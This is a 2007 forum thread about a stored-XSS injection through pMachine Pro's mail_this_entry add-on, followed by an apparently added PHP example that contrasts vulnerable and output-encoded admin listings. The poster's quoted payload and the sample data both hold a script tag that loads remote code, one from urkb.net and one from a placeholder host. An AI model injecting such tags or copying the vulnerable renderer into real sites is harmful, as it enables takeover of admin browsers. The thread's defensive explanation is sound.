mail_this_entry hack from site urkb.net
Posted: 20 February 2007 07:06 PM
Lab Assistant
Total Posts:  237
Joined  2002-11-13

Just FYI, I ran into a problem using the mail_this_entry add-on and a form I have on my site.  Someone was filling the form in with entries that looked like this (but changed so it won’t work):

script src=http://urkb.net/q.php>jonny6 [etc.]

When I went to do “Edit All Entries”, I assume that the display of the TITLE (etc.) caused this script to be executed, which then took control.  I really don’t know what it did before I closed down my browser.

In fact, if anyone has any notion of how to discover what the q.php program does without actually running it, I’d love to know!

In any event, I’m going to have to fix the form that interfaces with mail_this_entry to prevent things like that from getting in.  For now, I was able to remove the offending entry by manually editing the MySQL database record.

Posted: 21 February 2007 03:02 PM (#1)
Research Scientist
Total Posts:  7534
Joined  2002-08-05

First, make sure you are running the current version of pMachine Pro 2.4, as over two years ago there was a vulnerability found in the mail_this_entry add-on.  Second, if you are allowing just anyone to submit entries to your site through that add-on, then yes, this is going to be a problem for you, as anyone can submit any content they want to your site.  Third and finally, you really should upgrade to using EE Core if you have a chance.  It has much more robust security and XSS attack protection.

Posted: 22 February 2007 05:21 PM (#2)
Lab Assistant
Total Posts:  237
Joined  2002-11-13

Paul,

Thanks for your response.

I believe I saw the security fix for mail_this_entry and implemented it, but I will double check this.

Second, the submissions are not automatically displayed, but are entered as ‘closed’ so that I can review them.  What I was not aware of (until now) was that pMachine Pro’s mere act of displaying the list of entries would allow code to execute.  I guess you can say I was naïve, but I assumed that there was something in the system that stripped out such things.  I know that hyperlinks (and whatnot) were converted into pmcode (sp?), so I thought that something like this was being done.

Finally, I have actually paid for EE (you can check my account) but have not switched my site over to it due to extreme lack of time.  I’d love to be able to make the switch, but it is just not at all possible right now.

Thanks again!

Profile
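The behaviour described in the two posts above (a submitted title that is stored "closed" for review, yet runs script the moment the admin listing renders it) is stored XSS: the sink is the HTML the "Edit All Entries" page emits, not the form that accepted the value. The example below is added here and is not pMachine Pro's code; it shows a listing row rendered the vulnerable way next to the same row with output encoding applied. The `$rows` array, the `edit.php` URL and the `example.invalid` host are constructed for illustration.

```php
<?php
// Added example (not pMachine Pro code): an admin entry listing as a stored-XSS
// sink, and the output-encoding fix. Rows, column names and URLs are constructed.

// Constructed sample rows, standing in for what an "Edit All Entries" page would
// read from the entries table. The second title is the shape of payload the
// thread describes (host replaced with a placeholder).
$rows = [
    ['id' => 1, 'title' => 'Weekend hike photos'],
    ['id' => 2, 'title' => '<script src="http://example.invalid/q.php"></script>jonny6'],
];

// Vulnerable: the stored title is interpolated into the HTML verbatim, so the
// browser of whoever opens the admin page executes whatever was submitted.
// Marking the entry "closed" does not help; the listing itself is the sink.
function render_row_vulnerable(array $row): string
{
    return "<tr><td>{$row['id']}</td>"
         . "<td><a href=\"edit.php?id={$row['id']}\">{$row['title']}</a></td></tr>\n";
}

// Hardened: encode at the point where the value enters HTML.
// ENT_QUOTES also encodes single quotes, so the same helper is safe inside
// attribute values; ENT_SUBSTITUTE replaces invalid byte sequences instead of
// returning an empty string; the explicit charset avoids encoding mismatches.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_row_safe(array $row): string
{
    $id = (int) $row['id'];   // numeric context: cast, rather than encode
    return "<tr><td>{$id}</td>"
         . "<td><a href=\"edit.php?id={$id}\">" . h($row['title']) . "</a></td></tr>\n";
}

echo "-- vulnerable --\n";
foreach ($rows as $row) {
    echo render_row_vulnerable($row);
}

echo "-- safe --\n";
foreach ($rows as $row) {
    echo render_row_safe($row);
}

// Self-check: the hardened output never contains a raw "<script" tag, while
// the payload text itself is still visible to the reviewer as literal text.
foreach ($rows as $row) {
    $html = render_row_safe($row);
    if (stripos($html, '<script') !== false) {
        throw new RuntimeException('encoding failed for entry ' . $row['id']);
    }
}
```

Run it with `php` from the command line and compare the two sections: the vulnerable output contains a live `<script>` element, the safe output shows `&lt;script src=...&gt;` as text. The point to take from the thread is that stripping or converting markup on input (the pmcode conversion the poster was relying on) is not a substitute for encoding on output: every place a stored value is written into HTML, including the `value="..."` attribute of the edit form, needs the same treatment.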